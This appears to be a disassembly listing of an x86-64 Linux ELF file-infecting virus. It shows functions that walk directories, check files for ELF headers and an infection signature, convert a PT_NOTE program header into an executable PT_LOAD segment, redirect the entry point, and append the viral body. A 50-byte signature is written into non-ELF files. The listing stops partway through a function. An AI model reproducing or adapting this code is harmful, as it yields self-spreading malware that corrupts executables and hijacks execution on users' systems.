  4015f0:	41 56                	push   %r14
  4015f2:	53                   	push   %rbx
  4015f3:	49 89 fc             	mov    %rdi,%r12
  4015f6:	49 89 f5             	mov    %rsi,%r13
  4015f9:	49 89 d6             	mov    %rdx,%r14
  4015fc:	4c 39 e9             	cmp    %r13,%rcx
  4015ff:	77 3e                	ja     40163f <virus_search_signature.vss_not_found>
  401601:	48 31 db             	xor    %rbx,%rbx

0000000000401604 <virus_search_signature.vss_loop>:
  401604:	4c 89 e8             	mov    %r13,%rax
  401607:	48 29 d8             	sub    %rbx,%rax
  40160a:	48 39 c8             	cmp    %rcx,%rax
  40160d:	72 30                	jb     40163f <virus_search_signature.vss_not_found>
  40160f:	51                   	push   %rcx
  401610:	49 8d 3c 1c          	lea    (%r12,%rbx,1),%rdi
  401614:	4c 89 f6             	mov    %r14,%rsi
  401617:	48 31 c0             	xor    %rax,%rax

000000000040161a <virus_search_signature.vss_compare_loop>:
  40161a:	48 39 c8             	cmp    %rcx,%rax
  40161d:	7d 18                	jge    401637 <virus_search_signature.vss_found>
  40161f:	44 8a 04 07          	mov    (%rdi,%rax,1),%r8b
  401623:	44 8a 0c 06          	mov    (%rsi,%rax,1),%r9b
  401627:	45 38 c8             	cmp    %r9b,%r8b
  40162a:	75 05                	jne    401631 <virus_search_signature.vss_next>
  40162c:	48 ff c0             	inc    %rax
  40162f:	eb e9                	jmp    40161a <virus_search_signature.vss_compare_loop>

0000000000401631 <virus_search_signature.vss_next>:
  401631:	59                   	pop    %rcx
  401632:	48 ff c3             	inc    %rbx
  401635:	eb cd                	jmp    401604 <virus_search_signature.vss_loop>

0000000000401637 <virus_search_signature.vss_found>:
  401637:	59                   	pop    %rcx
  401638:	b8 01 00 00 00       	mov    $0x1,%eax
  40163d:	eb 03                	jmp    401642 <virus_search_signature.vss_done>

000000000040163f <virus_search_signature.vss_not_found>:
  40163f:	48 31 c0             	xor    %rax,%rax

0000000000401642 <virus_search_signature.vss_done>:
  401642:	5b                   	pop    %rbx
  401643:	41 5e                	pop    %r14
  401645:	41 5d                	pop    %r13
  401647:	41 5c                	pop    %r12
  401649:	48 89 ec             	mov    %rbp,%rsp
  40164c:	5d                   	pop    %rbp
  40164d:	c3                   	ret

000000000040164e <virus_list_and_infect>:
  40164e:	55                   	push   %rbp
  40164f:	48 89 e5             	mov    %rsp,%rbp
  401652:	48 81 ec 80 10 00 00 	sub    $0x1080,%rsp
  401659:	41 54                	push   %r12
  40165b:	41 55                	push   %r13
  40165d:	41 56                	push   %r14
  40165f:	53                   	push   %rbx
  401660:	49 89 fc             	mov    %rdi,%r12
  401663:	49 89 f5             	mov    %rsi,%r13
  401666:	49 89 d6             	mov    %rdx,%r14
  401669:	4c 89 e7             	mov    %r12,%rdi
  40166c:	e8 64 ff ff ff       	call   4015d5 <virus_str_len>
  401671:	48 89 45 f8          	mov    %rax,-0x8(%rbp)
  401675:	b8 01 01 00 00       	mov    $0x101,%eax
  40167a:	bf 9c ff ff ff       	mov    $0xffffff9c,%edi
  40167f:	4c 89 e6             	mov    %r12,%rsi
  401682:	ba 00 00 01 00       	mov    $0x10000,%edx
  401687:	45 31 d2             	xor    %r10d,%r10d
  40168a:	0f 05                	syscall
  40168c:	48 85 c0             	test   %rax,%rax
  40168f:	0f 88 b1 00 00 00    	js     401746 <virus_list_and_infect.vl_done>
  401695:	48 89 c3             	mov    %rax,%rbx

0000000000401698 <virus_list_and_infect.vl_read_loop>:
  401698:	b8 d9 00 00 00       	mov    $0xd9,%eax
  40169d:	89 df                	mov    %ebx,%edi
  40169f:	48 8d b5 80 ef ff ff 	lea    -0x1080(%rbp),%rsi
  4016a6:	ba 00 10 00 00       	mov    $0x1000,%edx
  4016ab:	0f 05                	syscall
  4016ad:	48 85 c0             	test   %rax,%rax
  4016b0:	0f 8e 87 00 00 00    	jle    40173d <virus_list_and_infect.vl_close_dir>
  4016b6:	48 89 45 f0          	mov    %rax,-0x10(%rbp)
  4016ba:	48 c7 45 e8 00 00 00 	movq   $0x0,-0x18(%rbp)
  4016c1:	00 

00000000004016c2 <virus_list_and_infect.vl_process_entry>:
  4016c2:	48 8b 45 e8          	mov    -0x18(%rbp),%rax
  4016c6:	48 3b 45 f0          	cmp    -0x10(%rbp),%rax
  4016ca:	7d cc                	jge    401698 <virus_list_and_infect.vl_read_loop>
  4016cc:	48 8d bd 80 ef ff ff 	lea    -0x1080(%rbp),%rdi
  4016d3:	48 01 c7             	add    %rax,%rdi
  4016d6:	0f b7 4f 10          	movzwl 0x10(%rdi),%ecx
  4016da:	48 89 4d e0          	mov    %rcx,-0x20(%rbp)
  4016de:	0f b6 47 12          	movzbl 0x12(%rdi),%eax
  4016e2:	48 8d 77 13          	lea    0x13(%rdi),%rsi
  4016e6:	80 3e 2e             	cmpb   $0x2e,(%rsi)
  4016e9:	75 12                	jne    4016fd <virus_list_and_infect.vl_not_dot>
  4016eb:	80 7e 01 00          	cmpb   $0x0,0x1(%rsi)
  4016ef:	74 3e                	je     40172f <virus_list_and_infect.vl_next_entry>
  4016f1:	80 7e 01 2e          	cmpb   $0x2e,0x1(%rsi)
  4016f5:	75 06                	jne    4016fd <virus_list_and_infect.vl_not_dot>
  4016f7:	80 7e 02 00          	cmpb   $0x0,0x2(%rsi)
  4016fb:	74 32                	je     40172f <virus_list_and_infect.vl_next_entry>

00000000004016fd <virus_list_and_infect.vl_not_dot>:
  4016fd:	3c 08                	cmp    $0x8,%al
  4016ff:	75 2e                	jne    40172f <virus_list_and_infect.vl_next_entry>
  401701:	4c 89 e7             	mov    %r12,%rdi
  401704:	48 8b 45 f8          	mov    -0x8(%rbp),%rax
  401708:	48 01 c7             	add    %rax,%rdi
  40170b:	80 7f ff 2f          	cmpb   $0x2f,-0x1(%rdi)
  40170f:	74 06                	je     401717 <virus_list_and_infect.vl_no_slash>
  401711:	c6 07 2f             	movb   $0x2f,(%rdi)
  401714:	48 ff c7             	inc    %rdi

0000000000401717 <virus_list_and_infect.vl_no_slash>:
  401717:	57                   	push   %rdi
  401718:	e8 af fe ff ff       	call   4015cc <virus_str_copy>
  40171d:	5f                   	pop    %rdi
  40171e:	4c 89 e7             	mov    %r12,%rdi
  401721:	e8 33 00 00 00       	call   401759 <virus_infect_elf>
  401726:	48 8b 45 f8          	mov    -0x8(%rbp),%rax
  40172a:	41 c6 04 04 00       	movb   $0x0,(%r12,%rax,1)

000000000040172f <virus_list_and_infect.vl_next_entry>:
  40172f:	48 8b 45 e8          	mov    -0x18(%rbp),%rax
  401733:	48 03 45 e0          	add    -0x20(%rbp),%rax
  401737:	48 89 45 e8          	mov    %rax,-0x18(%rbp)
  40173b:	eb 85                	jmp    4016c2 <virus_list_and_infect.vl_process_entry>

000000000040173d <virus_list_and_infect.vl_close_dir>:
  40173d:	b8 03 00 00 00       	mov    $0x3,%eax
  401742:	89 df                	mov    %ebx,%edi
  401744:	0f 05                	syscall

0000000000401746 <virus_list_and_infect.vl_done>:
  401746:	5b                   	pop    %rbx
  401747:	41 5e                	pop    %r14
  401749:	41 5d                	pop    %r13
  40174b:	41 5c                	pop    %r12
  40174d:	48 81 c4 80 10 00 00 	add    $0x1080,%rsp
  401754:	48 89 ec             	mov    %rbp,%rsp
  401757:	5d                   	pop    %rbp
  401758:	c3                   	ret

0000000000401759 <virus_infect_elf>:
  401759:	55                   	push   %rbp
  40175a:	48 89 e5             	mov    %rsp,%rbp
  40175d:	48 81 ec 80 10 00 00 	sub    $0x1080,%rsp
  401764:	41 54                	push   %r12
  401766:	41 55                	push   %r13
  401768:	41 56                	push   %r14
  40176a:	53                   	push   %rbx
  40176b:	49 89 fc             	mov    %rdi,%r12
  40176e:	b8 01 01 00 00       	mov    $0x101,%eax
  401773:	bf 9c ff ff ff       	mov    $0xffffff9c,%edi
  401778:	4c 89 e6             	mov    %r12,%rsi
  40177b:	ba 02 00 00 00       	mov    $0x2,%edx
  401780:	45 31 d2             	xor    %r10d,%r10d
  401783:	0f 05                	syscall
  401785:	48 85 c0             	test   %rax,%rax
  401788:	0f 88 b9 03 00 00    	js     401b47 <virus_infect_elf.vi_done>
  40178e:	49 89 c5             	mov    %rax,%r13
  401791:	b8 08 00 00 00       	mov    $0x8,%eax
  401796:	44 89 ef             	mov    %r13d,%edi
  401799:	31 f6                	xor    %esi,%esi
  40179b:	ba 02 00 00 00       	mov    $0x2,%edx
  4017a0:	0f 05                	syscall
  4017a2:	48 85 c0             	test   %rax,%rax
  4017a5:	0f 88 92 03 00 00    	js     401b3d <virus_infect_elf.vi_close_fail>
  4017ab:	48 89 45 f8          	mov    %rax,-0x8(%rbp)
  4017af:	b8 08 00 00 00       	mov    $0x8,%eax
  4017b4:	44 89 ef             	mov    %r13d,%edi
  4017b7:	31 f6                	xor    %esi,%esi
  4017b9:	31 d2                	xor    %edx,%edx
  4017bb:	0f 05                	syscall
  4017bd:	b8 00 00 00 00       	mov    $0x0,%eax
  4017c2:	44 89 ef             	mov    %r13d,%edi
  4017c5:	48 8d 75 90          	lea    -0x70(%rbp),%rsi
  4017c9:	ba 40 00 00 00       	mov    $0x40,%edx
  4017ce:	0f 05                	syscall
  4017d0:	48 83 f8 40          	cmp    $0x40,%rax
  4017d4:	0f 8c ba 02 00 00    	jl     401a94 <virus_infect_elf.vi_handle_non_elf>
  4017da:	48 8d 7d 90          	lea    -0x70(%rbp),%rdi
  4017de:	81 3f 7f 45 4c 46    	cmpl   $0x464c457f,(%rdi)
  4017e4:	0f 85 aa 02 00 00    	jne    401a94 <virus_infect_elf.vi_handle_non_elf>
  4017ea:	80 7f 04 02          	cmpb   $0x2,0x4(%rdi)
  4017ee:	0f 85 a0 02 00 00    	jne    401a94 <virus_infect_elf.vi_handle_non_elf>
  4017f4:	0f b7 47 10          	movzwl 0x10(%rdi),%eax
  4017f8:	66 83 f8 02          	cmp    $0x2,%ax
  4017fc:	74 0a                	je     401808 <virus_infect_elf.vi_valid_elf_type>
  4017fe:	66 83 f8 03          	cmp    $0x3,%ax
  401802:	0f 85 8c 02 00 00    	jne    401a94 <virus_infect_elf.vi_handle_non_elf>

0000000000401808 <virus_infect_elf.vi_valid_elf_type>:
  401808:	4c 89 7d d0          	mov    %r15,-0x30(%rbp)
  40180c:	b8 08 00 00 00       	mov    $0x8,%eax
  401811:	44 89 ef             	mov    %r13d,%edi
  401814:	31 f6                	xor    %esi,%esi
  401816:	31 d2                	xor    %edx,%edx
  401818:	0f 05                	syscall
  40181a:	48 31 db             	xor    %rbx,%rbx
  40181d:	4c 8b 75 f8          	mov    -0x8(%rbp),%r14

0000000000401821 <virus_infect_elf.vi_sig_check_loop>:
  401821:	b8 00 00 00 00       	mov    $0x0,%eax
  401826:	44 89 ef             	mov    %r13d,%edi
  401829:	48 8d b5 80 ef ff ff 	lea    -0x1080(%rbp),%rsi
  401830:	ba 00 10 00 00       	mov    $0x1000,%edx
  401835:	0f 05                	syscall
  401837:	48 85 c0             	test   %rax,%rax
  40183a:	7e 5d                	jle    401899 <virus_infect_elf.vi_sig_check_done>
  40183c:	50                   	push   %rax
  40183d:	4c 8b 7d d0          	mov    -0x30(%rbp),%r15
  401841:	48 8d bd 80 ef ff ff 	lea    -0x1080(%rbp),%rdi
  401848:	48 89 c6             	mov    %rax,%rsi
  40184b:	49 8d 97 d3 01 00 00 	lea    0x1d3(%r15),%rdx
  401852:	b9 32 00 00 00       	mov    $0x32,%ecx
  401857:	e8 8c fd ff ff       	call   4015e8 <virus_search_signature>
  40185c:	59                   	pop    %rcx
  40185d:	48 85 c0             	test   %rax,%rax
  401860:	75 2e                	jne    401890 <virus_infect_elf.vi_already_infected>
  401862:	48 01 cb             	add    %rcx,%rbx
  401865:	4c 39 f3             	cmp    %r14,%rbx
  401868:	7d 2f                	jge    401899 <virus_infect_elf.vi_sig_check_done>
  40186a:	48 89 de             	mov    %rbx,%rsi
  40186d:	48 83 ee 32          	sub    $0x32,%rsi
  401871:	48 83 c6 01          	add    $0x1,%rsi
  401875:	48 85 f6             	test   %rsi,%rsi
  401878:	78 1f                	js     401899 <virus_infect_elf.vi_sig_check_done>
  40187a:	b8 08 00 00 00       	mov    $0x8,%eax
  40187f:	44 89 ef             	mov    %r13d,%edi
  401882:	31 d2                	xor    %edx,%edx
  401884:	0f 05                	syscall
  401886:	48 85 c0             	test   %rax,%rax
  401889:	78 0e                	js     401899 <virus_infect_elf.vi_sig_check_done>
  40188b:	48 89 c3             	mov    %rax,%rbx
  40188e:	eb 91                	jmp    401821 <virus_infect_elf.vi_sig_check_loop>

0000000000401890 <virus_infect_elf.vi_already_infected>:
  401890:	4c 8b 7d d0          	mov    -0x30(%rbp),%r15
  401894:	e9 a4 02 00 00       	jmp    401b3d <virus_infect_elf.vi_close_fail>

0000000000401899 <virus_infect_elf.vi_sig_check_done>:
  401899:	4c 8b 7d d0          	mov    -0x30(%rbp),%r15
  40189d:	b8 08 00 00 00       	mov    $0x8,%eax
  4018a2:	44 89 ef             	mov    %r13d,%edi
  4018a5:	31 f6                	xor    %esi,%esi
  4018a7:	31 d2                	xor    %edx,%edx
  4018a9:	0f 05                	syscall
  4018ab:	b8 00 00 00 00       	mov    $0x0,%eax
  4018b0:	44 89 ef             	mov    %r13d,%edi
  4018b3:	48 8d 75 90          	lea    -0x70(%rbp),%rsi
  4018b7:	ba 40 00 00 00       	mov    $0x40,%edx
  4018bc:	0f 05                	syscall
  4018be:	48 8d 7d 90          	lea    -0x70(%rbp),%rdi
  4018c2:	48 8b 47 18          	mov    0x18(%rdi),%rax
  4018c6:	48 89 45 f0          	mov    %rax,-0x10(%rbp)
  4018ca:	4c 8b 77 20          	mov    0x20(%rdi),%r14
  4018ce:	0f b7 47 36          	movzwl 0x36(%rdi),%eax
  4018d2:	48 89 45 e0          	mov    %rax,-0x20(%rbp)
  4018d6:	0f b7 47 38          	movzwl 0x38(%rdi),%eax
  4018da:	48 89 45 d8          	mov    %rax,-0x28(%rbp)
  4018de:	b8 08 00 00 00       	mov    $0x8,%eax
  4018e3:	44 89 ef             	mov    %r13d,%edi
  4018e6:	4c 89 f6             	mov    %r14,%rsi
  4018e9:	31 d2                	xor    %edx,%edx
  4018eb:	0f 05                	syscall
  4018ed:	48 8b 45 d8          	mov    -0x28(%rbp),%rax
  4018f1:	48 0f af 45 e0       	imul   -0x20(%rbp),%rax
  4018f6:	48 89 c2             	mov    %rax,%rdx
  4018f9:	b8 00 00 00 00       	mov    $0x0,%eax
  4018fe:	44 89 ef             	mov    %r13d,%edi
  401901:	48 8d b5 80 ef ff ff 	lea    -0x1080(%rbp),%rsi
  401908:	0f 05                	syscall
  40190a:	48 8d bd 80 ef ff ff 	lea    -0x1080(%rbp),%rdi
  401911:	48 31 c9             	xor    %rcx,%rcx
  401914:	48 8b 45 d8          	mov    -0x28(%rbp),%rax

0000000000401918 <virus_infect_elf.vi_find_note>:
  401918:	48 39 c1             	cmp    %rax,%rcx
  40191b:	0f 8d 1c 02 00 00    	jge    401b3d <virus_infect_elf.vi_close_fail>
  401921:	48 89 ca             	mov    %rcx,%rdx
  401924:	48 0f af 55 e0       	imul   -0x20(%rbp),%rdx
  401929:	48 8d 34 17          	lea    (%rdi,%rdx,1),%rsi
  40192d:	83 3e 04             	cmpl   $0x4,(%rsi)
  401930:	74 05                	je     401937 <virus_infect_elf.vi_found_note>
  401932:	48 ff c1             	inc    %rcx
  401935:	eb e1                	jmp    401918 <virus_infect_elf.vi_find_note>

0000000000401937 <virus_infect_elf.vi_found_note>:
  401937:	56                   	push   %rsi
  401938:	48 8d bd 80 ef ff ff 	lea    -0x1080(%rbp),%rdi
  40193f:	48 31 c9             	xor    %rcx,%rcx
  401942:	4d 31 c0             	xor    %r8,%r8
  401945:	48 8b 45 d8          	mov    -0x28(%rbp),%rax

0000000000401949 <virus_infect_elf.vi_find_max_vaddr>:
  401949:	48 39 c1             	cmp    %rax,%rcx
  40194c:	7d 26                	jge    401974 <virus_infect_elf.vi_found_max_vaddr>
  40194e:	48 89 ca             	mov    %rcx,%rdx
  401951:	48 0f af 55 e0       	imul   -0x20(%rbp),%rdx
  401956:	48 8d 34 17          	lea    (%rdi,%rdx,1),%rsi
  40195a:	83 3e 01             	cmpl   $0x1,(%rsi)
  40195d:	75 10                	jne    40196f <virus_infect_elf.vi_next_phdr>
  40195f:	4c 8b 4e 10          	mov    0x10(%rsi),%r9
  401963:	4c 03 4e 28          	add    0x28(%rsi),%r9
  401967:	4d 39 c1             	cmp    %r8,%r9
  40196a:	7e 03                	jle    40196f <virus_infect_elf.vi_next_phdr>
  40196c:	4d 89 c8             	mov    %r9,%r8

000000000040196f <virus_infect_elf.vi_next_phdr>:
  40196f:	48 ff c1             	inc    %rcx
  401972:	eb d5                	jmp    401949 <virus_infect_elf.vi_find_max_vaddr>

0000000000401974 <virus_infect_elf.vi_found_max_vaddr>:
  401974:	48 8b 45 f8          	mov    -0x8(%rbp),%rax
  401978:	49 89 c1             	mov    %rax,%r9
  40197b:	48 25 ff 0f 00 00    	and    $0xfff,%rax
  401981:	49 81 c0 ff 0f 00 00 	add    $0xfff,%r8
  401988:	49 81 e0 00 f0 ff ff 	and    $0xfffffffffffff000,%r8
  40198f:	49 01 c0             	add    %rax,%r8
  401992:	5e                   	pop    %rsi
  401993:	c7 06 01 00 00 00    	movl   $0x1,(%rsi)
  401999:	c7 46 04 07 00 00 00 	movl   $0x7,0x4(%rsi)
  4019a0:	4c 89 4e 08          	mov    %r9,0x8(%rsi)
  4019a4:	4c 89 46 10          	mov    %r8,0x10(%rsi)
  4019a8:	4c 89 46 18          	mov    %r8,0x18(%rsi)
  4019ac:	4c 89 45 e8          	mov    %r8,-0x18(%rbp)
  4019b0:	b8 94 07 00 00       	mov    $0x794,%eax
  4019b5:	48 89 46 20          	mov    %rax,0x20(%rsi)
  4019b9:	48 89 46 28          	mov    %rax,0x28(%rsi)
  4019bd:	48 c7 46 30 00 10 00 	movq   $0x1000,0x30(%rsi)
  4019c4:	00 
  4019c5:	b8 08 00 00 00       	mov    $0x8,%eax
  4019ca:	44 89 ef             	mov    %r13d,%edi
  4019cd:	4c 89 f6             	mov    %r14,%rsi
  4019d0:	31 d2                	xor    %edx,%edx
  4019d2:	0f 05                	syscall
  4019d4:	48 8b 45 d8          	mov    -0x28(%rbp),%rax
  4019d8:	48 0f af 45 e0       	imul   -0x20(%rbp),%rax
  4019dd:	48 89 c2             	mov    %rax,%rdx
  4019e0:	b8 01 00 00 00       	mov    $0x1,%eax
  4019e5:	44 89 ef             	mov    %r13d,%edi
  4019e8:	48 8d b5 80 ef ff ff 	lea    -0x1080(%rbp),%rsi
  4019ef:	0f 05                	syscall
  4019f1:	48 8b 45 e8          	mov    -0x18(%rbp),%rax
  4019f5:	48 83 c0 19          	add    $0x19,%rax
  4019f9:	48 8d 7d 90          	lea    -0x70(%rbp),%rdi
  4019fd:	48 89 47 18          	mov    %rax,0x18(%rdi)
  401a01:	b8 08 00 00 00       	mov    $0x8,%eax
  401a06:	44 89 ef             	mov    %r13d,%edi
  401a09:	31 f6                	xor    %esi,%esi
  401a0b:	31 d2                	xor    %edx,%edx
  401a0d:	0f 05                	syscall
  401a0f:	b8 01 00 00 00       	mov    $0x1,%eax
  401a14:	44 89 ef             	mov    %r13d,%edi
  401a17:	48 8d 75 90          	lea    -0x70(%rbp),%rsi
  401a1b:	ba 40 00 00 00       	mov    $0x40,%edx
  401a20:	0f 05                	syscall
  401a22:	48 8d bd 80 ef ff ff 	lea    -0x1080(%rbp),%rdi
  401a29:	4c 89 fe             	mov    %r15,%rsi
  401a2c:	b9 94 07 00 00       	mov    $0x794,%ecx

0000000000401a31 <virus_infect_elf.vi_copy_virus>:
  401a31:	48 85 c9             	test   %rcx,%rcx
  401a34:	74 0f                	je     401a45 <virus_infect_elf.vi_copy_done>
  401a36:	8a 06                	mov    (%rsi),%al
  401a38:	88 07                	mov    %al,(%rdi)
  401a3a:	48 ff c6             	inc    %rsi
  401a3d:	48 ff c7             	inc    %rdi
  401a40:	48 ff c9             	dec    %rcx
  401a43:	eb ec                	jmp    401a31 <virus_infect_elf.vi_copy_virus>

0000000000401a45 <virus_infect_elf.vi_copy_done>:
  401a45:	48 8d bd 80 ef ff ff 	lea    -0x1080(%rbp),%rdi
  401a4c:	48 8b 45 f0          	mov    -0x10(%rbp),%rax
  401a50:	48 8b 4d e8          	mov    -0x18(%rbp),%rcx
  401a54:	48 83 c1 19          	add    $0x19,%rcx
  401a58:	48 29 c8             	sub    %rcx,%rax
  401a5b:	48 89 07             	mov    %rax,(%rdi)
  401a5e:	b8 08 00 00 00       	mov    $0x8,%eax
  401a63:	44 89 ef             	mov    %r13d,%edi
  401a66:	31 f6                	xor    %esi,%esi
  401a68:	ba 02 00 00 00       	mov    $0x2,%edx
  401a6d:	0f 05                	syscall
  401a6f:	b8 01 00 00 00       	mov    $0x1,%eax
  401a74:	44 89 ef             	mov    %r13d,%edi
  401a77:	48 8d b5 80 ef ff ff 	lea    -0x1080(%rbp),%rsi
  401a7e:	ba 94 07 00 00       	mov    $0x794,%edx
  401a83:	0f 05                	syscall
  401a85:	b8 03 00 00 00       	mov    $0x3,%eax
  401a8a:	44 89 ef             	mov    %r13d,%edi
  401a8d:	0f 05                	syscall
  401a8f:	e9 b3 00 00 00       	jmp    401b47 <virus_infect_elf.vi_done>

0000000000401a94 <virus_infect_elf.vi_handle_non_elf>:
  401a94:	b8 08 00 00 00       	mov    $0x8,%eax
  401a99:	44 89 ef             	mov    %r13d,%edi
  401a9c:	31 f6                	xor    %esi,%esi
  401a9e:	31 d2                	xor    %edx,%edx
  401aa0:	0f 05                	syscall
  401aa2:	48 31 db             	xor    %rbx,%rbx
  401aa5:	4c 8b 75 f8          	mov    -0x8(%rbp),%r14

0000000000401aa9 <virus_infect_elf.vi_non_elf_sig_loop>:
  401aa9:	b8 00 00 00 00       	mov    $0x0,%eax
  401aae:	44 89 ef             	mov    %r13d,%edi
  401ab1:	48 8d b5 80 ef ff ff 	lea    -0x1080(%rbp),%rsi
  401ab8:	ba 00 10 00 00       	mov    $0x1000,%edx
  401abd:	0f 05                	syscall
  401abf:	48 85 c0             	test   %rax,%rax
  401ac2:	7e 50                	jle    401b14 <virus_infect_elf.vi_non_elf_append>
  401ac4:	50                   	push   %rax
  401ac5:	48 8d bd 80 ef ff ff 	lea    -0x1080(%rbp),%rdi
  401acc:	48 89 c6             	mov    %rax,%rsi
  401acf:	49 8d 97 d3 01 00 00 	lea    0x1d3(%r15),%rdx
  401ad6:	b9 32 00 00 00       	mov    $0x32,%ecx
  401adb:	e8 08 fb ff ff       	call   4015e8 <virus_search_signature>
  401ae0:	59                   	pop    %rcx
  401ae1:	48 85 c0             	test   %rax,%rax
  401ae4:	75 57                	jne    401b3d <virus_infect_elf.vi_close_fail>
  401ae6:	48 01 cb             	add    %rcx,%rbx
  401ae9:	4c 39 f3             	cmp    %r14,%rbx
  401aec:	7d 26                	jge    401b14 <virus_infect_elf.vi_non_elf_append>
  401aee:	48 89 de             	mov    %rbx,%rsi
  401af1:	48 83 ee 32          	sub    $0x32,%rsi
  401af5:	48 83 c6 01          	add    $0x1,%rsi
  401af9:	48 85 f6             	test   %rsi,%rsi
  401afc:	78 16                	js     401b14 <virus_infect_elf.vi_non_elf_append>
  401afe:	b8 08 00 00 00       	mov    $0x8,%eax
  401b03:	44 89 ef             	mov    %r13d,%edi
  401b06:	31 d2                	xor    %edx,%edx
  401b08:	0f 05                	syscall
  401b0a:	48 85 c0             	test   %rax,%rax
  401b0d:	78 05                	js     401b14 <virus_infect_elf.vi_non_elf_append>
  401b0f:	48 89 c3             	mov    %rax,%rbx
  401b12:	eb 95                	jmp    401aa9 <virus_infect_elf.vi_non_elf_sig_loop>

0000000000401b14 <virus_infect_elf.vi_non_elf_append>:
  401b14:	b8 08 00 00 00       	mov    $0x8,%eax
  401b19:	44 89 ef             	mov    %r13d,%edi
  401b1c:	31 f6                	xor    %esi,%esi
  401b1e:	ba 02 00 00 00       	mov    $0x2,%edx
  401b23:	0f 05                	syscall
  401b25:	b8 01 00 00 00       	mov    $0x1,%eax
  401b2a:	44 89 ef             	mov    %r13d,%edi
  401b2d:	49 8d b7 d3 01 00 00 	lea    0x1d3(%r15),%rsi
  401b34:	ba 32 00 00 00       	mov    $0x32,%edx
  401b39:	0f 05                	syscall
  401b3b:	eb 00                	jmp    401b3d <virus_infect_elf.vi_close_fail>

0000000000401b3d <virus_infect_elf.vi_close_fail>:
  401b3d:	b8 03 00 00 00       	mov    $0x3,%eax
  401b42:	44 89 ef             	mov    %r13d,%edi
  401b45:	0f 05                	syscall

0000000000401b47 <virus_infect_elf.vi_done>:
  401b47:	5b                   	pop    %rbx
  401b48:	41 5e                	pop    %r14
  401b4a:	41 5d                	pop    %r13
  401b4c:	41 5c                	pop    %r12
  401b4e:	48 81 c4 80 10 00 00 	add    $0x1080,%rsp
  401b55:	48 89 ec             	mov    %rbp,%rsp
  401b58:	5d                   	pop    %rbp
  401b59:	c3                   	ret

0000000000401b5a <add_pt_load>:
  401b5a:	55                   	push   %rbp
  401b5b:	48 89 e5             	mov    %rsp,%rbp
  401b5e:	48 83 ec 50          	sub    $0x50,%rsp
  401b62:	41 54                	push   %r12
  401b64:	41 55                	push   %r13
  401b66:	41 56                	push   %r14
  401b68:	41 57                	push   %r15
  401b6a:	53                   	push   %rbx
  401b6b:	49 89 fc             	mov    %rdi,%r12
  401b6e:	e8 00 00 00 00       	call   401b73 <add_pt_load.get_virus_base>

0000000000401b73 <add_pt_load.get_virus_base>:
  401b73:	41 5f                	pop    %r15
  401b75:	49 81 ef ad 07 00 00 	sub    $0x7ad,%r15
  401b7c:	b8 01 01 00 00       	mov    $0x101,%eax
  401b81:	bf 9c ff ff ff       	mov    $0xffffff9c,%edi
  401b86:	4c 89 e6             	mov    %r12,%rsi
  401b89:	ba 02 00 00 00       	mov    $0x2,%edx
  401b8e:	45 31 d2             	xor    %r10d,%r10d
  401b91:	0f 05                	syscall
  401b93:	48 85 c0             	test   %rax,%rax
  401b96:	0f 88 00 03 00 00    	js     401e9c <add_pt_load.add_pt_load_done>
  401b9c:	49 89 c5             	mov    %rax,%r13
  401b9f:	b8 08 00 00 00       	mov    $0x8,%eax
  401ba4:	44 89 ef             	mov    %r13d,%edi
  401ba7:	31 f6                	xor    %esi,%esi
  401ba9:	ba 02 00 00 00       	mov    $0x2,%edx
  401bae:	0f 05                	syscall
  401bb0:	48 85 c0             	test   %rax,%rax
  401bb3:	0f 88 d9 02 00 00    	js     401e92 <add_pt_load.add_pt_load_close_fail>
  401bb9:	48 89 45 f8          	mov    %rax,-0x8(%rbp)
  401bbd:	b8 08 00 00 00       	mov    $0x8,%eax
  401bc2:	44 89 ef             	mov    %r13d,%edi
  401bc5:	31 f6                	xor    %esi,%esi
  401bc7:	31 d2                	xor    %edx,%edx
  401bc9:	0f 05                	syscall
  401bcb:	b8 00 00 00 00       	mov    $0x0,%eax
  401bd0:	44 89 ef             	mov    %r13d,%edi
  401bd3:	48 8d 35 b6 24 10 00 	lea    0x1024b6(%rip),%rsi        # 504090 <elf_header_buf>
  401bda:	ba 40 00 00 00       	mov    $0x40,%edx
  401bdf:	0f 05                	syscall
  401be1:	48 83 f8 40          	cmp    $0x40,%rax
  401be5:	0f 8c a7 02 00 00    	jl     401e92 <add_pt_load.add_pt_load_close_fail>
  401beb:	b8 08 00 00 00       	mov    $0x8,%eax
  401bf0:	44 89 ef             	mov    %r13d,%edi
  401bf3:	31 f6                	xor    %esi,%esi
  401bf5:	31 d2                	xor    %edx,%edx
  401bf7:	0f 05                	syscall
  401bf9:	48 31 db             	xor    %rbx,%rbx
  401bfc:	4c 8b 75 f8          	mov    -0x8(%rbp),%r14

0000000000401c00 <add_pt_load.apt_sig_check_loop>:
  401c00:	b8 00 00 00 00       	mov    $0x0,%eax
  401c05:	44 89 ef             	mov    %r13d,%edi
  401c08:	48 8d 35 c1 32 10 00 	lea    0x1032c1(%rip),%rsi        # 504ed0 <sig_check_buf>
  401c0f:	ba 00 10 00 00       	mov    $0x1000,%edx
  401c14:	0f 05                	syscall
  401c16:	48 85 c0             	test   %rax,%rax
  401c19:	7e 54                	jle    401c6f <add_pt_load.apt_sig_check_done>
  401c1b:	50                   	push   %rax
  401c1c:	48 8d 3d ad 32 10 00 	lea    0x1032ad(%rip),%rdi        # 504ed0 <sig_check_buf>
  401c23:	48 89 c6             	mov    %rax,%rsi
  401c26:	48 8d 15 02 f4 ff ff 	lea    -0xbfe(%rip),%rdx        # 40102f <signature>
  401c2d:	b9 32 00 00 00       	mov    $0x32,%ecx
  401c32:	e8 98 f4 ff ff       	call   4010cf <search_substring>
  401c37:	59                   	pop    %rcx
  401c38:	48 85 c0             	test   %rax,%rax
  401c3b:	0f 85 51 02 00 00    	jne    401e92 <add_pt_load.add_pt_load_close_fail>
  401c41:	48 01 cb             	add    %rcx,%rbx
  401c44:	4c 39 f3             	cmp    %r14,%rbx
  401c47:	7d 26                	jge    401c6f <add_pt_load.apt_sig_check_done>
  401c49:	48 89 de             	mov    %rbx,%rsi
  401c4c:	48 83 ee 32          	sub    $0x32,%rsi
  401c50:	48 83 c6 01          	add    $0x1,%rsi
  401c54:	48 85 f6             	test   %rsi,%rsi
  401c57:	78 16                	js     401c6f <add_pt_load.apt_sig_check_done>
  401c59:	b8 08 00 00 00       	mov    $0x8,%eax
  401c5e:	44 89 ef             	mov    %r13d,%edi
  401c61:	31 d2                	xor    %edx,%edx
  401c63:	0f 05                	syscall
  401c65:	48 85 c0             	test   %rax,%rax
  401c68:	78 05                	js     401c6f <add_pt_load.apt_sig_check_done>
  401c6a:	48 89 c3             	mov    %rax,%rbx
